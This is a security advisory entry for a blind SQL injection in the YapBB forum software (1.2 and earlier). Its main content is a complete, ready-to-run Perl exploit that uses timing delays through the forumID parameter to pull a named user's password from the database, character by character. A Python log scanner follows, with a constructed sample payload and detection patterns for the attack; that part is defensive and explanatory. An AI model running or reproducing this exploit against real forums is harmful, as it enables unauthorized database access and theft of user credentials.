YapBB <= 1.2 (forumID) Blind SQL Injection Exploit

2009.03.08
Credit: darkjoker
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--+++======================================================+++--
--+++====== YapBB <= 1.2 Blind SQL Injection Exploit ======+++--
--+++======================================================+++--

#!/usr/bin/perl
# YapBB <= 1.2 time-based blind SQL injection proof of concept (darkjoker).
use strict;
use warnings;
use IO::Socket;

sub usage {
    die "\nYapBB <= 1.2 Blind SQL Injection Exploit".
        "\n[?] Author  : darkjoker".
        "\n[?] Site    : http://darkjoker.net23.net".
        "\n[?] CMS Site: http://yapbb.sourceforge.net/".
        "\n[?] Usage   : perl ${0} <hostname> <path> <username> [<key_list>]".
        "\n[?] Ex.     : perl ${0} localhost /YapBB root abcdefghijklmnopqrstuvwxyz".
        "\n\n";
}

# Build the injected forumID value. When character $pos of the stored
# password equals $chr, the IF() takes the BENCHMARK branch and the
# response is delayed; otherwise it returns immediately.
sub query {
    my ($user, $chr, $pos) = @_;
    my $query = "123 OR IF ((ASCII(SUBSTRING((SELECT password FROM ".
                "forum_user WHERE nickname = '${user}'),${pos},1))=${chr}),BENCHMARK(200000000,CHAR(0)),0)";
    $query =~ s/ /%20/g;
    $query =~ s/'/%27/g;
    return $query;
}

# Send one request and return 1 if the reply took longer than 4 seconds.
sub exploit {
    my ($hostname, $path, $user, $chr, $pos) = @_;
    $chr = ord ($chr);
    my $sock = IO::Socket::INET->new (
        PeerHost => $hostname,
        PeerPort => 80,
        Proto    => "tcp"
    ) or die "\n[!] Exploit failed.\n\n";
    my $query   = query ($user, $chr, $pos);
    my $request = "GET ${path}/forumhop.php?action=next&forumID=${query} HTTP/1.1\r\n".
                  "Host: ${hostname}\r\n".
                  "Connection: Close\r\n\r\n";
    my $start = time ();
    print $sock $request;
    1 while (<$sock>);    # read the whole response before stopping the clock
    my $elapsed = time () - $start;
    close ($sock);
    return 1 if ($elapsed > 4);
    return 0;
}

my ($hostname, $path, $user, $k_list) = @ARGV;
usage unless ($user);
my @key = split ("", ($k_list) ? $k_list : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789");
my $chr      = 0;
my $pos      = 1;
my $password = "";

# Try each key character at the current position; on a hit, append it,
# move to the next position and restart the key list. The loop ends when
# no character matches, i.e. past the end of the password.
while ($chr < scalar (@key)) {
    if (exploit ($hostname, $path, $user, $key [$chr], $pos)) {
        $password .= $key [$chr];
        $chr = 0;
        $pos++;
    } else {
        $chr++;
    }
}
print "\n[+] Password: ${password}\n\n";
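The probe above never changes the page content; only the response time leaks a bit, so a content-based IDS signature sees nothing. What a defender can see is the forumID value itself: YapBB expects an integer, and the exploit sends a long expression. The following is an added example, not part of the advisory and not YapBB's code. It applies the mitigation (forumID must be a plain integer) as a check and runs it over a few constructed Apache-style access-log lines, flagging values that are not integers and, separately, values containing MySQL time-delay primitives. The IP address, timestamps and log format are assumptions chosen for the sample.

```python
"""Detect the forumID injection pattern in web-server access logs.

Added example (not YapBB code, not the advisory author's exploit).
Assumes Apache "combined"-style log lines; the sample below is constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: one legitimate request, one request carrying the
# advisory's time-based payload (spaces and quotes percent-encoded exactly
# as the PoC encodes them), one non-numeric value, one unrelated page.
SAMPLE_LOG = (
    '203.0.113.5 - - [08/Mar/2009:10:00:01 +0100] "GET /YapBB/forumhop.php?action=next&forumID=12 HTTP/1.1" 200 1532\n'
    '203.0.113.5 - - [08/Mar/2009:10:00:02 +0100] "GET /YapBB/forumhop.php?action=next&forumID=123%20OR%20IF%20((ASCII(SUBSTRING((SELECT%20password%20FROM%20forum_user%20WHERE%20nickname%20=%20%27root%27),1,1))=97),BENCHMARK(200000000,CHAR(0)),0) HTTP/1.1" 200 1532\n'
    '203.0.113.5 - - [08/Mar/2009:10:00:09 +0100] "GET /YapBB/forumhop.php?action=next&forumID=12abc HTTP/1.1" 200 1532\n'
    '203.0.113.5 - - [08/Mar/2009:10:00:10 +0100] "GET /YapBB/index.php HTTP/1.1" 200 4021\n'
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+) \S+$'
)
# MySQL functions commonly used to make a blind probe measurable by delay.
TIME_DELAY_RE = re.compile(r'\b(BENCHMARK|SLEEP)\s*\(', re.IGNORECASE)


def is_valid_forum_id(value):
    """The mitigation: forumID is a plain non-negative integer, nothing else.

    This is the same test the application should apply (or a cast to int /
    a bound parameter) before the value reaches the SQL query.
    """
    return re.fullmatch(r'[0-9]{1,10}', value) is not None


def classify_forum_id(value):
    """Classify one already-decoded forumID value."""
    if is_valid_forum_id(value):
        return "ok"
    if TIME_DELAY_RE.search(value):
        return "time-based-sqli"
    return "malformed"


def scan_log(text):
    """Return (ip, timestamp, verdict, decoded forumID) for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/forumhop.php"):
            continue
        # parse_qs percent-decodes once; the payload's raw '=' is kept
        # because the parser splits each pair on the first '=' only.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("forumID", []):
            verdict = classify_forum_id(value)
            if verdict != "ok":
                findings.append((m.group("ip"), m.group("ts"), verdict, value))
    return findings


if __name__ == "__main__":
    for ip, ts, verdict, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {verdict}: forumID={value!r}")
```

The integer check is the real fix; the signature regex only catches the delay primitives named in it and is there to label the hit, not to be the sole control. A request with a malformed forumID is worth alerting on even when no known function name appears.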


Copyright 2024, cxsecurity.com